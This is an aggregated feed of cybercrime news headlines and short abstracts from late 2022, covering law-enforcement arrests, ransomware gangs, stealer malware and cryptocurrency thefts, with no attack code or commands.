Interpol Seized $130 Million from Cybercriminals in Global “HAECHI-III” Crackdown Operation Full Text

Abstract Interpol on Thursday  announced  the seizure of $130 million worth of virtual assets in connection with a global crackdown on cyber-enabled financial crimes and money laundering. The international police operation, dubbed  HAECHI-III , transpired between June 28 and November 23, 2022, resulting in the arrests of 975 individuals and the closure of more than 1,600 cases. This comprised two fugitives wanted by South Korea for their supposed involvement in a Ponzi scheme to embezzle €28 million from 2,000 victims. Another instance pertained to a call center scam based out of India, wherein a group of criminals impersonated Interpol and Europol officers to trick victims in Austria into transferring funds. The call centers operated from New Delhi and Noida. The illegal activity informed the victims that their "identities were stolen and crime pertaining to narcotics drugs were committed in their names," forcing them to make a money transfer. "In order to clear themselve

The Hacker News

November 24, 2022

Interpol seized $130 million from cybercriminals worldwide Full Text

Abstract INTERPOL has announced the seizure of $130,000,000 million worth of money and virtual assets linked to various cybercrimes and money laundering operations.

BleepingComputer

November 24, 2022

U.S. govt seizes domains used in ‘pig butchering’ scams Full Text

Abstract For the first time, the U.S. Department of Justice seized seven domains that hosted websites linked to "pig butchering" scams, where fraudsters trick victims of romance scams into investing in cryptocurrency via fake investment platforms.

BleepingComputer

November 24, 2022

‘iSpoof’ service dismantled, main operator and 145 users arrested Full Text

Abstract The 'iSpoof' online spoofing service has been dismantled following an international law enforcement investigation that also led to the arrest of 146 people, including the suspected mastermind of the operation.

BleepingComputer

November 24, 2022

Black Basta Ransomware Gang Actively Infiltrating U.S. Companies with Qakbot Malware Full Text

Abstract Companies based in the U.S. have been at the receiving end of an "aggressive" Qakbot malware campaign that leads to Black Basta ransomware infections on compromised networks. "In this latest campaign, the Black Basta ransomware gang is using QakBot malware to create an initial point of entry and move laterally within an organization's network," Cybereason researchers Joakim Kandefelt and Danielle Frankel  said  in a report shared with The Hacker News. Black Basta, which emerged in April 2022, follows the tried-and-tested approach of double extortion to steal sensitive data from targeted companies and use it as leverage to extort cryptocurrency payments by threatening to release the stolen information. This is not the first time the ransomware crew has been observed using Qakbot (aka QBot, QuackBot, or Pinkslipbot). Last month, Trend Micro  disclosed  similar attacks that entailed the use of Qakbot to deliver the  Brute Ratel C4  framework, which, in turn, w

The Hacker News

November 23, 2022

34 Russian Cybercrime Groups Stole Over 50 Million Passwords with Stealer Malware Full Text

Abstract As many as 34 Russian-speaking gangs distributing information-stealing malware under the stealer-as-a-service model stole no fewer than 50 million passwords in the first seven months of 2022. "The underground market value of stolen logs and compromised card details is estimated around $5.8 million," Singapore-headquartered Group-IB  said  in a report shared with The Hacker News. Aside from looting passwords, the stealers also harvested 2.11 billion cookie files, 113,204 crypto wallets, and 103,150 payment cards. A majority of the victims are located in the U.S., followed by Brazil, India, Germany, Indonesia, the Philippines, France, Turkey, Vietnam, and Italy. In total, 890,000 devices in 111 countries were infected during the time frame. Group-IB said the members of several scam groups who are propagating the information stealers previously participated in the  Classiscam  operation. These groups, which are active on Telegram and have around 200 members on average, a

The Hacker News

November 23, 2022

Exclusive – Quantum Locker lands in the Cloud Full Text

Abstract The gang behind Quantum Locker used a particular modus operandi to target large enterprises relying on cloud services in the NACE region. Executive Summary Quantum Locker gang demonstrated capabilities to operate ransomware extortion even on cloud...

Security Affairs

November 23, 2022

Russian cybergangs stole over 50 million passwords this year Full Text

Abstract At least 34 distinct Russian-speaking cybercrime groups using info-stealing malware like Raccoon and Redline have collectively stolen 50,350,000 account passwords from over 896,000 individual infections from January to July 2022.

BleepingComputer

November 22, 2022

Donut extortion group also targets victims with ransomware Full Text

Abstract The Donut (D0nut) extortion group has been confirmed to deploy ransomware in double-extortion attacks on the enterprise.

BleepingComputer

November 22, 2022

Researchers Warn of Cyber Criminals Using Go-based Aurora Stealer Malware Full Text

Abstract A nascent Go-based malware known as Aurora Stealer is being increasingly deployed as part of campaigns designed to steal sensitive information from compromised hosts. "These infection chains leveraged phishing pages impersonating download pages of legitimate software, including cryptocurrency wallets or remote access tools, and the 911 method making use of YouTube videos and SEO-poised fake cracked software download websites," cybersecurity firm SEKOIA  said . First advertised on Russian cybercrime forums in April 2022, Aurora was offered as a commodity malware for other threat actors, describing it as a "multi-purpose botnet with stealing, downloading and remote access capabilities." In the intervening months, the malware has been scaled down to a stealer that can harvest files of interest, data from 40 cryptocurrency wallets, and applications like Telegram. Aurora also comes with a loader that can deploy a next-stage payloading using a PowerShell command.

The Hacker News

November 22, 2022

Vietnam-Based Ducktail Cybercrime Operation Evolving, Expanding Full Text

Abstract The Ducktail information stealer has been updated with new capabilities and the threat actors that use it have been expanding their operation, according to WithSecure, formerly known as F-Secure Business.

Security Week

November 22, 2022

Luna Moth Gang Invests in Call Centers to Target Businesses with Callback Phishing Campaigns Full Text

Abstract The Luna Moth campaign has extorted hundreds of thousands of dollars from several victims in the legal and retail sectors. The attacks are notable for employing a technique called  callback phishing  or telephone-oriented attack delivery ( TOAD ), wherein the victims are social engineered into making a phone call through phishing emails containing invoices and subscription-themed lures. Palo Alto Networks Unit 42 said the attacks are the "product of a single highly organized campaign," adding, "this threat actor has significantly invested in call centers and infrastructure that's unique to each victim." The cybersecurity firm  described  the activity as a "pervasive multi-month campaign that is actively evolving." What's notable about callback phishing is that the email messages are completely devoid of any malicious attachment or booby-trapped link, allowing them to evade detection and slip past email protection solutions. These messages ty

The Hacker News

November 22, 2022

Two Estonian citizens arrested in $575M cryptocurrency fraud scheme Full Text

Abstract Two Estonian citizens were arrested in Tallinn for allegedly running a $575 million cryptocurrency fraud scheme. Two Estonian nationals were arrested in Tallinn, Estonia, after being indicted in the US for running a fraudulent cryptocurrency Ponzi...

Security Affairs

November 21, 2022

Two Estonians arrested for running $575M crypto Ponzi scheme Full Text

Abstract Two Estonian nationals were arrested in Tallinn, Estonia, on Sunday after being indicted in the U.S. for running a massive cryptocurrency Ponzi scheme that led to losses of more than $575 million.

BleepingComputer

November 21, 2022

Daixin Ransomware Gang Steals 5 Million AirAsia Passengers’ and Employees’ Data Full Text

Abstract The cybercrime group called Daixin Team has leaked sample data belonging to AirAsia, a Malaysian low-cost airline, on its data leak portal. The development comes a little over a week after the company fell victim to a ransomware attack on November 11 and 12, per  DataBreaches.net . The threat actors allegedly claim to have obtained the personal data associated with five million unique passengers and all of its employees. The samples uploaded to the leak site reveal passenger information and the booking IDs as well as personal data related to the company's staff. A spokesperson for the threat actor told DataBreaches.net that further attacks were not pursued owing to AirAsia's poor security measures and "the chaotic organization of the network." Daixin Team was recently the subject of an  advisory  from the U.S. cybersecurity and intelligence agencies, which warned of attacks mainly aimed at the healthcare sector. Other victims of the criminal group include Fi

The Hacker News

November 21, 2022

Hackers steal $300,000 in DraftKings credential stuffing attack Full Text

Abstract Sports betting company DraftKings said today that it would make whole customers affected by a credential stuffing attack that led to losses of up to $300,000.

BleepingComputer

November 19, 2022

Hive ransomware crooks extort $100m from 1,300 global orgs Full Text

Abstract In a joint advisory with CISA and HHS, the FBI this week detailed Hive indicators of compromise and commonly used techniques and procedures that the Feds have observed as recently as this month.

The Register

November 18, 2022

Hive Ransomware Attackers Extorted $100 Million from Over 1,300 Companies Worldwide Full Text

Abstract The threat actors behind the Hive ransomware-as-a-service (RaaS) scheme have launched attacks against over 1,300 companies across the world, netting the gang $100 million in illicit payments as of November 2022. "Hive ransomware has targeted a wide range of businesses and critical infrastructure sectors, including government facilities, communications, critical manufacturing, information technology, and — especially — Healthcare and Public Health (HPH)," U.S. cybersecurity and intelligence authorities  said  in an alert. Active since June 2021, Hive's RaaS operation involves a mix of developers, who create and manage the malware, and affiliates, who are responsible for conducting the attacks on target networks by often purchasing initial access from initial access brokers (IABs). In most cases, gaining a foothold involves the exploitation of  ProxyShell flaws  in Microsoft Exchange Server, followed by taking steps to terminate processes associated with antivirus engi

The Hacker News

November 17, 2022

FBI-Wanted Leader of the Notorious Zeus Botnet Gang Arrested in Geneva Full Text

Abstract A Ukrainian national who has been wanted by the U.S for over a decade has been arrested by Swiss authorities for his role in a notorious cybercriminal ring that stole millions of dollars from victims' bank accounts using malware called Zeus . Vyacheslav Igorevich Penchukov, who went by online pseu­do­nyms "tank" and "father," is said to have been involved in the day-to-day operations of the group. He was apprehended on October 23, 2022, and is pending extradition to the U.S. Details of the arrest were  first reported  by independent security journalist Brian Krebs. Penchukov, along with Ivan Viktorovich Klepikov (aka "petrovich" and "nowhere") and Alexey Dmitrievich Bron (aka "thehead"), was  first charged  in the District of Nebraska in August 2012. According to court documents released by the U.S. Depart of Justice (DoJ) in 2014, Penchukov and eight other members of the cybercriminal group  infected  "thousands of busin

The Hacker News

November 17, 2022

Tank, the leader of the Zeus cybercrime gang, was arrested by the Swiss police Full Text

Abstract A suspected leader of the Zeus cybercrime gang, Vyacheslav Igorevich Penchukov (aka Tank), was arrested by Swiss police. Swiss police last month arrested in Geneva Vyacheslav Igorevich Penchukov (40), also known as Tank, which is one of the leaders...

Security Affairs

November 16, 2022

Suspected Zeus cybercrime ring leader ‘Tank’ arrested by Swiss police Full Text

Abstract Vyacheslav Igorevich Penchukov, also known as Tank and one of the leaders of the notorious JabberZeus cybercrime gang, was arrested in Geneva last month.

BleepingComputer

November 15, 2022

Avast details Worok espionage group’s compromise chain Full Text

Abstract Cyber espionage group Worok abuses Dropbox API to exfiltrate data via using a backdoor hidden in apparently innocuous image files. Researchers from cybersecurity firm Avast observed the recently discovered espionage group Worok abusing Dropbox API to exfiltrate...

Security Affairs

November 14, 2022

Ransomware gangs shift tactics, making crimes harder to track Full Text

Abstract Ransomware gangs increasingly use their own or stolen computer code, moving away from a ransomware-as-a-service model that made their activities easier to monitor, new research shows.

LA Times

November 13, 2022

Ukraine Police dismantled a transnational fraud group that made €200 million per year Full Text

Abstract Ukraine's Cyber ​​Police and Europol arrested 5 Ukrainian citizens who are members of a large-scale transnational fraud group. Ukraine's cyber police and Europol arrested five members of a transnational fraud group that caused more than 200 million...

Security Affairs

November 13, 2022

Lockbit gang leaked data stolen from global high-tech giant Thales Full Text

Abstract The Lockbit 3.0 ransomware gang started leaking the information allegedly stolen from the global high-tech company Thales. Thales is a global high-tech leader with more than 81,000 employees worldwide. The Group invests in digital and deep tech innovations...

Security Affairs

November 12, 2022

Russian Hackers Are Publishing Stolen Abortion Records on the Dark Web Full Text

Abstract Hackers who stole a trove of data from one of Australia’s biggest private health insurers are drip-feeding sensitive details of customers' medical diagnoses and procedures, including abortions, onto the dark web.

Vice

November 11, 2022

U.S. seized 18 web domains used for recruiting money mules Full Text

Abstract The FBI and U.S. Postal Inspection Service have seized eighteen web domains used to recruit money mules for work-from-home and reshipping scams.

BleepingComputer

November 11, 2022

‘We know who you are’: Australian police say Russian cybercriminals behind Medibank hack Full Text

Abstract The Australian federal police say hackers in Russia are responsible for the Medibank data breach, with the commissioner stating “we know who you are”. Reece Kershaw said on Friday that the AFP had identified the hackers while working with Interpol.

The Guardian

November 10, 2022

Update: Ransomware Gang Offers to Sell Files Stolen From Continental for $50 Million Full Text

Abstract Continental reported in August that it had been targeted in a cyberattack that resulted in hackers accessing some of its systems. The company said at the time that the attack had been “averted” and that business activities were not affected.

Security Week

November 10, 2022

Ukraine arrests fraud ring members who made €200 million per year Full Text

Abstract Ukraine's cyber police and Europol have identified and arrested five key members of an international investment fraud ring estimated to have caused losses of over €200 million per year.

BleepingComputer

November 10, 2022

Russian LockBit ransomware operator arrested in Canada Full Text

Abstract Europol has announced today the arrest of a Russian national linked to LockBit ransomware attacks targeting critical infrastructure organizations and high-profile companies worldwide.

BleepingComputer

November 8, 2022

US DoJ seizes $3.36B Bitcoin from Silk Road hacker Full Text

Abstract The U.S. Department of Justice condemned James Zhong, a hacker who stole 50,000 bitcoins from the Silk Road dark net marketplace. The US Department of Justice announced that a man from Georgia, James Zhong, has pleaded guilty to wire fraud after stealing...

Security Affairs

November 07, 2022

U.S. unmasks hacker who stole 50,000 bitcoins from Silk Road Full Text

Abstract The U.S. Department of Justice has announced today the conviction of James Zhong, a mysterious hacker who stole 50,000 bitcoins from the 'Silk Road' dark net marketplace.

BleepingComputer

November 07, 2022

Ransomware gang threatens to release stolen Medibank data Full Text

Abstract A ransomware gang that some believe is a relaunch of REvil and others track as BlogXX has claimed responsibility for last month's ransomware attack against Australian health insurance provider Medibank Private Limited.

BleepingComputer

November 6, 2022

LockBit 3.0 gang claims to have stolen data from Kearney & Company Full Text

Abstract The ransomware group LockBit claimed to have stolen data from consulting and IT services provider Kearney & Company. Kearney is the premier CPA firm that services across the financial management spectrum to government entities. The company provides...

Security Affairs

November 3, 2022

LockBit ransomware gang claims the hack of Continental automotive group Full Text

Abstract The LockBit ransomware group claimed to have hacked the multinational automotive group Continental and threatens to leak stolen data. LockBit ransomware gang announced to have hacked the German multinational automotive parts manufacturing...

Security Affairs

November 03, 2022

New Crimson Kingsnake gang impersonates law firms in BEC attacks Full Text

Abstract A business email compromise (BEC) group named 'Crimson Kingsnake' has emerged, impersonating well-known international law firms to trick recipients into approving overdue invoice payments.

BleepingComputer

November 3, 2022

Experts link the Black Basta ransomware operation to FIN7 cybercrime gang Full Text

Abstract Sentinel Labs found evidence that links the Black Basta ransomware gang to the financially motivated hacking group FIN7. Security researchers at Sentinel Labs shared details about Black Basta's TTPs and assess it is highly likely the ransomware operation...

Security Affairs

November 03, 2022

OPERA1ER hackers steal over $11 million from banks and telcos Full Text

Abstract A threat group that researchers call OPERA1ER has stolen at least $11 million from banks and telecommunication service providers in Africa using off-the-shelf hacking tools.

BleepingComputer

November 03, 2022

Black Basta ransomware gang linked to the FIN7 hacking group Full Text

Abstract Security researchers at Sentinel Labs have uncovered evidence that links the Black Basta ransomware gang to the financially motivated hacking group FIN7, also known as "Carbanak."

BleepingComputer

November 1, 2022

LockBit 3.0 gang claims to have stolen data from Thales Full Text

Abstract The ransomware group LockBit 3.0 claimed to have stolen data from the French defence and technology group Thales. Thales is a global high-tech leader with more than 81,000 employees worldwide. The Group invests in digital and deep tech innovations...

Security Affairs

October 30, 2022

German BKA arrested the alleged operator of Deutschland im Deep Web darknet market Full Text

Abstract German police arrested a student that is suspected of being the administrator of 'Deutschland im Deep Web' (DiDW) darknet marketplace. Germany's Federal Criminal Police Office (BKA) has arrested a student (22) in Bavaria, who is suspected of being...

Security Affairs

October 28, 2022

Student arrested for running one of Germany’s largest dark web markets Full Text

Abstract The Federal Criminal Police Office (BKA) in Germany have arrested a 22-year-old student in Bavaria, who is suspected of being the administrator of 'Deutschland im Deep Web' (DiDW) 3, one of the largest darknet markets in the country.

BleepingComputer

October 28, 2022

Raspberry Robin Operators Selling Cybercriminals Access to Thousands of Endpoints Full Text

Abstract The Raspberry Robin worm is becoming an access-as-a-service malware for deploying other payloads, including  IcedID ,  Bumblebee ,  TrueBot  (aka Silence), and  Clop ransomware . It is "part of a complex and interconnected malware ecosystem, with links to other malware families and alternate infection methods beyond its original USB drive spread," the Microsoft Security Threat Intelligence Center (MSTIC)  said  in a detailed write-up. Raspberry Robin , also called QNAP Worm owing to the use of compromised QNAP storage servers for command-and-control, is the name given to a malware by cybersecurity company Red Canary that spreads to Windows systems through infected USB drives. MSTIC is keeping tabs on the activity group behind the USB-based Raspberry Robin infections as  DEV-0856 , adding it's aware of at least four confirmed entry points that all have the likely end goal of deploying ransomware. The tech giant's cybersecurity team said that Raspberry Robin has

The Hacker News

October 27, 2022

Raspberry Robin operators are selling initial access to compromised enterprise networks to ransomware gangs Full Text

Abstract DEV-0950 group used Clop ransomware to encrypt the network of organizations previously infected with the Raspberry Robin worm. Microsoft has discovered recent activity that links the Raspberry Robin worm to human-operated ransomware attacks.  Data...

Security Affairs

October 27, 2022

British hacker arraigned for running The Real Deal dark web marketplace Full Text

Abstract A popular British hacker was charged by the U.S. authorities for allegedly running the 'The Real Deal' dark web marketplace. The British hacker Daniel Kaye (aka Bestbuy, Spdrman, Popopret, UserL0ser) (34) was charged by the U.S. DoJ for allegedly...

Security Affairs

October 25, 2022

Hive ransomware gang starts leaking data allegedly stolen from Tata Power Full Text

Abstract The Hive ransomware gang, which claimed the responsibility for the Tata Power data breach, started leaking data. On October 14, Tata Power, India’s largest power generation company, announced that was hit by a cyber attack. Threat actors hit the Information...

Security Affairs

October 25, 2022

Dutch police arrest hacker who breached healthcare software vendor Full Text

Abstract The Dutch police have arrested a 19-year-old man in western Netherlands, suspected of breaching the systems of a healthcare software vendor in the country, and stealing tens of thousands of documents.

BleepingComputer

October 25, 2022

Crooks Use Two Different POS Malware to Steal 167,000 Credit Card Numbers Full Text

Abstract The MajikPOS and Treasure Hunter malware infect Windows POS terminals and scan the devices to exploit the moments when card data is read and stored in plain text in memory.

The Register

October 25, 2022

Cybercriminals Used Two PoS Malware to Steal Details of Over 167,000 Credit Cards Full Text

Abstract Two point-of-sale (PoS) malware variants have been put to use by a threat actor to steal information related to more than 167,000 credit cards from payment terminals. According to Singapore-headquartered cybersecurity company Group-IB, the stolen data dumps could net the operators as much as $3.34 million by selling them on underground forums. While a significant proportion of attacks aimed at gathering payment data rely on  JavaScript sniffers  (aka web skimmers) stealthily inserted on e-commerce websites, PoS malware continues to be an ongoing, if less popular, threat. Just last month, Kaspersky detailed new tactics adopted by a Brazilian threat actor known as  Prilex  to steal money by means of fraudulent transactions. "Almost all PoS malware strains have a similar card dump extraction functionality, but different methods for maintaining persistence on infected devices, data exfiltration and processing," researchers Nikolay Shelekhov and Said Khamchiev  said . Trea

The Hacker News

October 22, 2022

Remote Control Tools Popular Among Cybercriminals Full Text

Abstract While remote access tools offer a flexible support to organizations, these tools are increasingly exploited by cybercriminals to harass target organizations. Remote shell is the most common remote access tool, then comes RATs, Cobalt Strike, and others.

Cyware Alerts - Hacker News

October 20, 2022

Brazilian police arrested a man suspected of being a member of LAPSUS$ gang Full Text

Abstract The Federal Police of Brazil arrested an individual who is suspected of being a member of the notorious LAPSUS$ extortionist group. The Federal Police of Brazil yesterday announced the arrest of an individual suspected of being linked to the LAPSUS$...

Security Affairs

October 20, 2022

Cybercriminals jailed for cryptocurrency theft, death threats Full Text

Abstract On Wednesday, two Massachusetts men were sentenced to more than two years in prison each for stealing cryptocurrency in SIM swapping attacks and hijacking their victims' social media accounts.

BleepingComputer

October 20, 2022

Brazilian Police Arrest Suspected Member of Lapsus$ Hacking Group Full Text

Abstract The Federal Police of Brazil on Wednesday announced it had arrested an individual for purported links to the notorious LAPSUS$ extortionist gang. The arrest was made as part of a new law enforcement effort, dubbed Operation Dark Cloud, that was launched in August 2022, the agency noted. Not much is known about the suspect other than the fact that the person could be a teenager. The Polícia Federal said it commenced its investigation in December 2021 following an attack on websites under Brazil's  Ministry of Health , resulting in the alleged exfiltration of 50TB of data and  temporary unavailability  of COVID-19 vaccination data of millions of citizens. Other federal government portals targeted by the LAPSUS$ group in Brazil include the Ministry of Economy, Comptroller General of the Union, and the Federal Highway Police. "The crimes determined in the police investigation are those of criminal organization, invasion of a computer device, interruption or disturbance of te

The Hacker News

October 19, 2022

Brazil arrests suspect linked to the Lapsus$ hacking group Full Text

Abstract Today, the Brazilian Federal Police arrested a Brazilian suspect in the city of Feira de Santana, Bahia, believed to be part of the Lapsus$ extortion gang.

BleepingComputer

October 19, 2022

The missed link between Ransom Cartel and REvil ransomware gangs Full Text

Abstract Researchers at Palo Alto Network's Unit 42 linked the Ransom Cartel ransomware operation to the REvil ransomware operations. Researchers at Palo Alto Network's Unit 42 have linked the relatively new Ransom Cartel ransomware operation with the notorious...

Security Affairs

October 18, 2022

Ransom Cartel linked to notorious REvil ransomware operation Full Text

Abstract Threat analysts have connected the pieces that link the Ransom Cartel RaaS (ransomware-as-a-service) to the REvil gang, one of the most notorious and prolific ransomware groups in recent years.

BleepingComputer

October 18, 2022

Law enforcement arrested 31 suspects for stealing cars by hacking key fobs Full Text

Abstract An international law enforcement operation led by Europol disrupted a cybercrime ring focused on hacking wireless key fobs to steal cars. The French authorities in cooperation with their Spanish and Latvian peers, and with the support of Europol and Eurojust,...

Security Affairs

October 18, 2022

European Police Arrest a Gang That Hacked Wireless Key Fobs to Steal Cars Full Text

Abstract Law enforcement authorities in France, in collaboration with Spain and Latvia, have disrupted a cybercrime ring that leveraged a hacking tool to steal cars without having to use a physical key fob. "The criminals targeted vehicles with keyless entry and start systems, exploiting the technology to get into the car and drive away," Europol  said  in a press statement. The coordinated operation, which took place on October 10, 2022, resulted in the arrest of 31 suspects from across 22 locations in the three nations, including software developers, its resellers, and the car thieves who used the tool to break into vehicles. Also confiscated by the officials as part of the arrests were criminal assets worth €1,098,500, not to mention an internet domain that allegedly advertised the service online. Per Europol, the criminals are said to have singled out keyless vehicles from two unnamed French car manufacturers. The perpetrators then used the fraudulent package to replace the

The Hacker News

October 17, 2022

Police dismantles criminal ring that hacked keyless cars Full Text

Abstract Authorities from France, Latvia, and Spain arrested 31 suspects believed to be part of a car theft ring that targeted vehicles from two French car manufacturers.

BleepingComputer

October 17, 2022

Interpol arrested 75 members of the cybercrime ring Black Axe Full Text

Abstract Interpol has announced the arrests of 75 individuals as part of a coordinated international operation against an organized cybercrime ring called Black Axe. Interpol arrested 75 individuals as part of a coordinated global operation, codenamed Operation...

Security Affairs

October 17, 2022

INTERPOL-led Operation Takes Down ‘Black Axe’ Cyber Crime Organization Full Text

Abstract The International Criminal Police Organization, also called the Interpol, has announced the arrests of 75 individuals as part of a coordinated global operation against an organized cyber crime syndicate called  Black Axe . "'Black Axe' and other West African organized crime groups have developed transnational networks, defrauding victims of millions while channeling their profits into lavish lifestyles and other criminal activities, from drug trafficking to sexual exploitation," the agency  said . The law enforcement effort, codenamed Operation Jackal, involved the participation of Argentina, Australia, Côte d'Ivoire, France, Germany, Ireland, Italy, Malaysia, Nigeria, Spain, South Africa, the U.A.E, the U.K., and the U.S. Two of the alleged online scammers, who were arrested late last month in South Africa, are believed to have orchestrated a variety of fraudulent schemes that netted them $1.8 million from victims. The probe further led to 49 property searc

The Hacker News

October 14, 2022

Police tricks DeadBolt ransomware out of 155 decryption keys Full Text

Abstract The Dutch National Police, in collaboration with cybersecurity firm Responders.NU, tricked the DeadBolt ransomware gang into handing over 155 decryption keys by faking ransom payments.

BleepingComputer

October 14, 2022

INTERPOL arrests ‘Black Axe’ cybercrime syndicate members Full Text

Abstract INTERPOL has arrested over 70 suspected members of the 'Black Axe' cybercrime syndicate, with two believed to be responsible for $1.8 million in financial fraud.

BleepingComputer

October 13, 2022

Celsius Exchange Data Dump Is a Gift to Crypto Sleuths—and Thieves Full Text

Abstract Last week, Celsius, a cryptocurrency exchange facing bankruptcy, leaked an enormous collection of its users' transaction data through an unusual sort of privacy breach: a court filing.

Wired

October 12, 2022

Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike Full Text

Abstract Brute Ratel is a commercial (paid) Adversary Emulation framework and a relative newcomer to the commercial C&C Framework space, where it competes with more established players such as Cobalt Strike.

Trend Micro

October 11, 2022

DeepFakes Are The Cybercriminal Economy’s Latest Business Line Full Text

Abstract California-based Resecurity has identified a new spike of underground services enabling bad actors to generate deepfakes. According to cybersecurity experts, this may be used for political propaganda, foreign influence activity, disinformation, scams,...

Security Affairs

October 10, 2022

Egypt Leaks (EG) Group Spills Financial Information from Egyptian Banks Full Text

Abstract New cybercriminal group Egypt Leaks has been targeting Egyptian financial institutions and leaking huge volumes of compromised payment data from major Egyptian banks on the dark web. The activity was first spotted in a Telegram channel created to leak Excel files carrying details of 12,229 cre ... Read More

Cyware Alerts - Hacker News

October 10, 2022

Hackers Steal $100 Million Cryptocurrency from Binance Bridge Full Text

Abstract BNB Chain, a blockchain linked to the Binance cryptocurrency exchange, disclosed an exploit on a cross-chain bridge that drained around $100 million in digital assets. "There was an exploit affecting the native cross-chain bridge between BNB Beacon Chain (BEP2) and BNB Smart Chain (BEP20 or BSC), known as 'BSC Token Hub,'" it  said  last week. "The exploit was through a sophisticated forging of the low level proof into one common library." According to Binance CEO Changpeng Zhao, the exploit on the cross-chain bridge " resulted in extra BNB ," prompting a  temporary suspension  of the Binance Smart Chain (BSC). "BNB, which stands for 'Build and Build' (formerly called Binance Coin), is the blockchain gas token that 'fuels' transactions on BNB Chain," Binance  noted  earlier this February. No user funds are said to have been impacted, since the vulnerability in the BSC Token Hub bridge enabled the unknown threat actor

The Hacker News

October 09, 2022

Darkweb market BidenCash gives away 1.2 million credit cards for free Full Text

Abstract A dark web carding market named 'BidenCash' has released a massive dump of 1,221,551 credit cards to promote their marketplace, allowing anyone to download them for free to conduct financial fraud.

BleepingComputer

October 9, 2022

Everest gang demands $200K for data stolen from South Africa state-owned electricity company ESKOM Full Text

Abstract Everest ransomware operators claimed to have hacked South Africa state-owned company ESKOM Hld SOC Ltd. In March 2022, the Everest ransomware operators published a notice announcing the sale of "South Africa Electricity company's root access" for $125,000....

Security Affairs

October 8, 2022

LilithBot Malware and Eternity Project’s Cybercrime Operation Full Text

Abstract The multi-function malware is being constantly developed by its operators who have added anti-VM checks and anti-debugging features too. LilithBot can steal cookies, screenshots, pictures, and browser history from infected systems.

Cyware Alerts - Hacker News

October 06, 2022

Hacker steals $566 million worth of crypto from Binance Bridge Full Text

Abstract Hackers have reportedly stolen 2 million Binance Coins (BNB), worth $566 million, from the Binance Bridge.

BleepingComputer

October 06, 2022

Eternity Group Hackers Offering New LilithBot Malware as a Service to Cybercriminals Full Text

Abstract The threat actor behind the malware-as-a-service (MaaS) called Eternity has been linked to new piece of malware called LilithBot . "It has advanced capabilities to be used as a miner, stealer, and a clipper along with its persistence mechanisms," Zscaler ThreatLabz researchers Shatak Jain and Aditya Sharma  said  in a Wednesday report. "The group has been continuously enhancing the malware, adding improvements such as anti-debug and anti-VM checks." Eternity Project  came on the scene earlier this year, advertising its warez and product updates on a Telegram channel. The services provided include a stealer, miner, clipper, ransomware, USB worm, and a DDoS bot. LilithBot is the latest addition to this list. Like its counterparts, the multifunctional malware bot is sold on a subscription basis to other cybercriminals in return for a cryptocurrency payment. Upon a successful compromise, the information gathered through the bot – browser history, cookies, pictu

The Hacker News

October 06, 2022

19-Year-Old Teen Arrested for Using Leaked Optus Breach Data in SMS Scam Full Text

Abstract The Australian Federal Police (AFP) has arrested a 19-year-old teen from Sydney for allegedly attempting to leverage the data leaked following the Optus data breach late last month to extort victims. The suspect is said to have carried out a text message blackmail scam, demanding that the recipients transfer $2,000 to a bank account or risk getting their personal information misused for fraudulent activities. The source of the data, the agency said, was a sample database of 10,200 records that was posted briefly on a cybercrime forum accessible on the clearnet by an actor named "optusdata," before taking it down. Details of the scam were  previously shared  by 9News Australia reporter Chris O'Keefe on September 27, 2022. The AFP further said it executed a search warrant at the home of the offender, leading to the seizure of a mobile phone used to send the text messages to about 93 Optus customers. "At this stage it appears none of the individuals who received t

The Hacker News

October 04, 2022

Russian Hacker Arrested in India for Reportedly Helping Students Cheat in JEE-Main Exam Full Text

Abstract India's Central Bureau of Investigation (CBI) on Monday disclosed that it has detained a Russian national for allegedly hacking into a software platform used to conduct engineering entrance assessments in the country in 2021. "The said accused was detained by the Bureau of Immigration at Indira Gandhi International Airport, Delhi while arriving in India from Almaty, Kazakhstan," the primary investigating agency  said  in a press release. The name of the individual was not disclosed by the agency, but Indian news reports identified the person as  Mikhail Shargin . The CBI further said that Shargin's role was uncovered as part of its investigation into alleged irregularities committed in the Joint Entrance Examination ( JEE-Main ) conducted last year. JEE is a standardized test used for admissions to engineering colleges in India. The September 2021 incident, per the agency, involved breaking into iLeon software, the platform on which the exam was held, with the g

The Hacker News

October 3, 2022

RansomEXX gang claims to have hacked Ferrari and leaked online internal documents Full Text

Abstract The Italian luxury sports car manufacturer Ferrari confirmed the availability of internal documents online, but said it has no evidence of cyber attack. Documents belonging to the Italian luxury sports car manufacturer Ferrari are circulating online,...

Security Affairs

October 02, 2022

Ransomware gang leaks data stolen from LAUSD school system Full Text

Abstract The Vice Society Ransomware gang published data and documents Sunday morning that were stolen from the Los Angeles Unified School District during a cyberattack earlier this month.

BleepingComputer

October 2, 2022

Hackers set Monday deadline for LAUSD to pay up or have private data posted on dark web Full Text

Abstract A criminal syndicate has set a Monday deadline for the Los Angeles public school system to pay a ransom or have its data released on the dark web, which could potentially expose the confidential information of students and employees.

LA Times

October 2, 2022

BlackCat ransomware gang claims to have hacked US defense contractor NJVC Full Text

Abstract Another US defense contractor suffered a data breach, the BlackCat ransomware gang claims to have hacked NJVC. The ALPHV/BlackCat ransomware gang claims to have breached the IT firm NJVC, which supports the federal government and the United States Department...

Security Affairs

October 2, 2022

German police identified a gang that stole €4 million via phishing attacks Full Text

Abstract German police arrested one individual suspected of having stolen €4 million from users via large-scale phishing campaigns. Germany's Bundeskriminalamt (BKA) arrested an individual (24) suspected of having stolen €4,000,000 from internet users...

Security Affairs

October 1, 2022

Cybercriminals See Allure in BEC Attacks Over Ransomware Full Text

Abstract While published trends in ransomware attacks have been contradictory — with some firms tracking more incidents and other fewer — business email compromise (BEC) attacks continue to have proven success against organizations.

Dark Reading

September 30, 2022

Germany arrests hacker for stealing €4 million via phishing attacks Full Text

Abstract Germany's Bundeskriminalamt (BKA), the country's federal criminal police, carried out raids on the homes of three individuals yesterday suspected of orchestrating large-scale phishing campaigns that defrauded internet users of €4,000,000.

BleepingComputer

September 30, 2022

‘Disgruntled insider’ shared REvil information with researchers, helped law enforcement Full Text

Abstract The insider went on to help researchers understand the inner workings of the group that became known as REvil, whose antics and crimes made headlines after attacking beef producer JBS.

CyberScoop

September 28, 2022

Cyber Criminals Using Quantum Builder Sold on Dark Web to Deliver Agent Tesla Malware Full Text

